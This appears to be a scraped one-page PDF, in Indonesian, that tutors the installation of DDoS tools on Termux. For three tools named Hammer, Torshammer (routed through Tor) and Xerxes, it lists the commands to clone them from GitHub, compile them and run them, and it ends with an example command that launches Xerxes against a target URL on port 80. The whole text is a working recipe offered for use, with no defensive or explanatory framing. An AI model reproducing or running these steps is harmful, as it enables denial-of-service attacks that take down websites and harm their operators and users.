Ddos Termux PDF

You might also like

Download as pdf or txt
Download as pdf or txt
You are on page 1of 1

Tutorial Install tools DDOS lewat Termux

Hammer

1.apt update

2.apt upgrade

3.pkg install git

4.pkg install python

5.git clone https://github.com/cyweb/hammer

6.cd hammer

7.python hammer.py

Torshammer

1.apt update

2.apt upgrade

3.pkg install git

4.pkg install tor

5.pkg install python2

6.tor

7.git clone https://github.com/dotfighter/torshammer.git

8.cd torshammer

9.python2 torshammer.py

Xerses

1.apt update && apt upgrade -y

2.apt install git && apt install clang -y

3.git clone https://github.com/zanyarjamal/xerxes

4.cd xerxes

5.clang xerxes.c -o xerxes

6../xerxes url.com 80

Created by : F45

You might also like